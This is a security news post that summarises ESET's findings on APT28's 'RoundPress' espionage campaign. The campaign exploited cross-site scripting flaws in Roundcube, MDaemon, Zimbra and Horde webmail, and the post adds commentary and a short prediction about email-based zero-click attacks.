Global Cyber Espionage Alert: APT28’s “RoundPress” Attack Exploits Webmail Vulnerabilities

Listen to this Post

Featured Image

Introduction:

A silent cyber war has been raging behind the scenes, and it’s targeting some of the world’s most sensitive digital infrastructures. A newly uncovered operation called RoundPress has been linked to the notorious Russian state-backed hacking group APT28—also known as Fancy Bear. By exploiting zero-day and known vulnerabilities (n-day flaws) in popular webmail servers, these hackers have managed to infiltrate critical government, military, and defense networks across multiple nations. This revelation by cybersecurity firm ESET exposes the ever-evolving landscape of cyber threats and the pressing need for organizations to harden their digital perimeters.

Inside the RoundPress Operation (30-line Digest):

ESET researchers have revealed a stealthy cyber espionage campaign named RoundPress, attributed to the Russian-backed APT28 group. The campaign began in 2023 and has carried on through 2024, targeting vulnerabilities in several widely used webmail platforms including Roundcube, Horde, MDaemon, and Zimbra. These attacks have affected governments in Greece, Serbia, Ukraine, and Cameroon; military organizations in Ukraine and Ecuador; and defense contractors in Bulgaria, Romania, and Ukraine.

The attackers employ phishing emails disguised with snippets of real news articles to enhance credibility. Once opened, these emails silently activate JavaScript exploits embedded within the HTML body. The only action required from the victim is to simply open the email—no clicking or interaction necessary. The malicious script harvests data such as emails, credentials, contact lists, and 2FA tokens, sending it to hardcoded servers controlled by the attackers.

Each exploit is fine-tuned for specific platforms. For instance, Roundcube was targeted with two distinct vulnerabilities—CVE-2020-35730 and CVE-2023-43770—each allowing JavaScript execution via email content. MDaemon suffered a zero-day flaw (CVE-2024-11182) that used malformed HTML to bypass security. Zimbra was exploited through a calendar-based injection (CVE-2024-27443). Meanwhile, a failed attempt was also made on the Horde platform, indicating widespread probing activity.

Despite no confirmed attacks being recorded in 2025, the techniques remain viable due to a steady flow of new XSS vulnerabilities in popular email platforms. This campaign highlights how seemingly minor email system flaws can serve as launchpads for wide-reaching data breaches, underlining the critical nature of cybersecurity vigilance across public and private sectors.

What Undercode Say:

APT28’s RoundPress campaign exemplifies the modern nature of espionage—quiet, precise, and devastatingly effective. This isn’t about brute force hacks or ransomware headlines. Instead, it’s about infiltrating the very communication tools we trust daily. These kinds of operations showcase the refined craftsmanship of state-sponsored threat actors who understand how to exploit small cracks for major gains.

Phishing remains the easiest entry point, but what makes RoundPress dangerous is the silent execution of malicious code without any user interaction. The weaponization of XSS flaws, which are often underestimated, reveals a deeper vulnerability in how webmail systems process and display user content. Webmail platforms like Roundcube and Zimbra, widely used by governments and businesses, become weak points if not regularly audited and patched.

APT28

The technical details also tell a story of evolution. From exploiting older known flaws in 2023 to using newly discovered zero-days in 2024, APT28 adapted their tools as defenders responded. Their shift toward abusing HTML email parsers and calendar invite logic indicates a shift from traditional document exploits to email UI logic manipulation—a trend that may catch unprepared security teams off guard.

This campaign also exposes systemic security weaknesses: many email systems are still vulnerable to XSS despite years of awareness. It’s not just about patching software but about re-engineering how email clients handle untrusted input. The fact that one malicious line of JavaScript in an HTML email can exfiltrate data across global networks should send alarm bells ringing.

As organizations move toward web-based tools for convenience, they must balance it with hardened security practices. Zero-day and n-day exploits are increasingly becoming tools in cyberwarfare, and defensive postures must adapt accordingly. RoundPress is a loud wake-up call to treat webmail with the same level of scrutiny given to critical infrastructure.

Fact Checker Results ✅:

✔️

✔️ Confirmed XSS vulnerabilities were used in Roundcube, MDaemon, and Zimbra
✔️ No persistent malware was used—only view-triggered scripts for exfiltration

🛡️

Prediction:

If current trends continue, 2025 will likely see an escalation in email-based zero-click attacks, especially via XSS in under-maintained platforms. APT28 and similar groups will continue evolving their methods, increasingly targeting overlooked layers like browser-based interfaces and calendar functions. Government agencies and enterprise security teams must proactively test and harden their email infrastructure, or risk becoming the next victim in a silent but highly strategic digital war.

References:

Reported By: www.bleepingcomputer.com
Extra Source Hub:
https://www.quora.com/topic/Technology
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram